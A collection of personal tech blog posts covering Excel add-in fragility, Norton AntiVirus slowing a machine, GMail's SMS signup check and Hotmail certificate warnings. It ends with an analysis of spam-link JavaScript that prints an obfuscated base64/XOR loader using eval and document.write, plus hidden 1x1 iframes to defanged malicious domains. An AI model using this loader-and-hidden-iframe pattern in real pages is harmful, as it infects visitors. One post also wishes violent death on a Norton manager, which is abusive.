Category: Technology

I’ve been dabbling with complex spreadsheet work, and I needed to actually write some code to run in Excel.  It turns out that Excel, while it is programmable, is fragile and easy to break.

The first problem I ran into was that as my program was running, I could start another Excel application which would interfere with the Excel instance I was using.  I was surprised by this, but reasonably happy that the solution was to simply set the Application.IgnoreRemoteRequests in my instance of Excel, and no longer broken by other Excel instances.

However, a few days later, I discovered Excel was completely broken on my machine.  It refused to open a spreadsheet from an email attachment, or from the desktop!  This was quite scary, and initially I didn’t know the cause at all.  Turns out there are lots of posts on the net about this – and it is relatively easy to fix – go to the Tools|Options|General tab in excel, and make sure that the item “Ignore Other Applications” is UNchecked.

Wait a minute – doesn’t “Ignore Other Applications” and “IgnoreRemoteRequests” sound pretty similar?  Why yes it does.  It turns out that when an Excel extension temporarily sets this setting, Excel persists it when it closes!  Whoa!  That is very fragile.  This means that if a plugin ever sets this setting and forgets to unset it, the user is left in the lurch forever! 

For the non-programmers out there, you might think that this is the fault of the Plugin, and that isn’t completely unreasonable.  But more accurately, this is the fault of Excel’s API being simply too fragile.  Very few APIs in the programming world work this way – where what seems to be a transient setting is actually saved permanently.  Further, if anything goes wrong with the plugin, there is no way to make a “failsafe” for this from the Plugin side.   Excel saves this setting behind the programmer’s back, and the programmer has no way to know when this setting is saved.  If you can’t know when it is saved, you obviously can’t know exactly when to ‘undo’ it either.  We can “hack” it, but we can’t fix it.

So, if you run into this problem, where Excel refuses to load files from email or the desktop, you’ll likely find lots of sites which tell you this same fix (Tools|Options|General|”Ignore Other Applications” = unchecked).  And it will work.  Those sites may further say something like, “this is usually due to a faulty plugin”.  All right, sort of.  But Excel is a far too easily broken interface.  If you are a programmer, you probably would do best to not write addins for Excel.  Your code will probably never be robust.

I made the mistake of installing Norton AntiVirus as part of Google Pack.  I guess I thought I would be nice to my new employer and try out the Pack. 

I’ve tried Norton a few times in the past – each time I uninstall it due to being a total system hog.  Once again, I’ve had the same experience.

My laptop is a few years old; its only got 256MB of RAM, but it runs fine.  But today, the first time booting since installing Norton, it took me 15 minutes to regain control of the system (this is not an exaggeration!!  I couldn’t get control of the mouse, the task manager, nothing for 15 minutes!).  Norton just completely monopolizes the disk and CPU.

It’s no wonder viruses spread so easily.  Norton has turned into the same bloatware you’d expect from Adobe or Microsoft, so of course users disable it.  It sucks.  Yes, Norton, we want you to scan for viruses.  But no, this is not permission to completely rape and pillage our hardware and prevent us from getting our work done.

Well, the uninstall of Norton is just about done now, so I’m done with this blog entry.  I hope the numbskull PM at Norton that thought that “well, if users can’t see that it is scanning we won’t get brand recognition” dies a cruel and horrible death.  I’ll be working hard within my company to make sure we get Norton out of the Google Pack.  It just isn’t Googley.

For several years, many sites have been using “CAPTCHA“s to ensure there is a real person signing up for an account.  We’ve all seen them – these are the questions where the user is asked to type in the letters of a distorted image before proceeding to the next step.

I just went to create a new GMail account, and I pleasantly discovered a new system, hopefully even more tricky for spammers to work around.  The GMail system requires that it be able to send an SMS message to your cellphone before it will let you create an account.  They will only allow 10 accounts per phone number to sign up.  So, even if the spammer manages to get 100 phones, he’s still not getting a very large number of GMail accounts. 

Of course, if you don’t have a SMS-capable cell-phone, I guess you are out-of-luck!  Maybe others have seem this already and I’m slow to notice.  But I thought this was pretty cool.

Since I know a few people at Microsoft on the Hotmail team, I’m hoping one of them will read this article and fix the problem. 

In short, Microsoft and Hotmail are helping internet users get phished due to Hotmail’s poor security practices.

There is a very nice summary of phishing techniques written up here.  One of the major problems they emphasize is how many existing and reputable sites condition users to ignore security.  Security is a tough enough problem to begin with, and the UI in our browsers is clearly deficient.  But on top of that, we’ve got companies like Microsoft not even practicing what they preach, and conditioning users to ignore security warnings.

My example today comes from Hotmail.  I’ve been seeing this problem for several months now, and I’m getting sick of it.  When you go to the hotmail site and try to login, you’ll be presented with the security box (click it to enlarge), indicating to the user that the certificate is invalid.  Unless you are a 100%-pure geek like me, you probably don’t know why it is invalid, or even what it really means.  You know, that in this case, you’ll probably get to read your email if you click OK.  So you ignore the problem.  WARNING – you could have just been phished.  And, when you go to the next site that presents that warning, what will you do?

This problem is very fixable.  Hotmail is in the process of changing the product name from hotmail to live mail, and they are redirecting in a way which exposes this problem.  This is really just laziness – it is a simple problem to fix with matching your domain name and your certificates.

When Microsoft won’t even configure their websites correctly, how can we expect the smaller and more ignorant companies to do so?  You might as well take all the dialog boxes in Internet Explorer and replace them with this (credit to University of Aukland for the image):

I get lots of spam comments on my blog each day.  Most are a similar looking spam with a bunch of links.  I moderate all comments to aviod spam, so none of this ever makes it to the site.  But today I got curious – what is this spam for?  Who sends it?

Manually following the URLs in my browser yields some javascript alerts where they are trying to get me to click “OK”.  Let’s see what happens if you do that.  It’s very interesting!

First off, you get the following script.  This is complicated javascript masking technique.  Let’s look at the code.

   1: <script>
   2: function bNVEXM(inp)

   3:  {

   4:    var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh...

   5:    var out="";

   6:    var c1,c2,c3="";

   7:    var e1,e2,e3,e4="";

   8:    var i=0; 

   9:    do { 

  10:      e1=k.indexOf(inp.charAt(i++));

  11:      e2=k.indexOf(inp.charAt(i++));

  12:      e3=k.indexOf(inp.charAt(i++));

  13:      e4=k.indexOf(inp.charAt(i++)); 

  14:      c1=(e1<<2)|(e2>>4);

  15:      c2=((e2&15)<<4)|(e3>>2);

  16:      c3=((e3&3)<<6)|e4;

  17:      out+=String.fromCharCode(c1); 

  18:      if(e3!=64){

  19:        out+=String.fromCharCode(c2)

  20:      };

  21:      if(e4!=64){

  22:        out+=String.fromCharCode(c3);

  23:      } 

  24:    } while(i<inp.length);

  25:    return out; 

  26:  }

  27:   

  28:  function fDVGFV(a1,b1){

  29:    if(!b1){

  30:      return eval(bNVEXM("ZG9jdW1lbnQud3JpdGUo...

  31:    } 

  32:    var i; 

  33:    var o="";

  34:    var k=314; 

  35:    a1=bNVEXM(a1);

  36:    for(i=0;i<a1.length;i++) {

  37:      o+=String.fromCharCode(

              (a1.charCodeAt(i)-32)^

               b1.charCodeAt((i%2)?i%k:Math.abs(k-i-1))%k);

  38:    }

  39:    return o;

  40:  }

  41:   

  42:  fDVGFV('YVxJUVNEUW5BNpiaaV59NWE2Zj4hNCYyNmQqPy8+bmpj...

  43:  </script>

   1:  document.write(fDVGFV(a1,arguments.callee.toString().replace(/s/g,"")));

<IFRAME SRC="http://xxxjoutweb.netxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="http://xxxfrlynx.infoxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>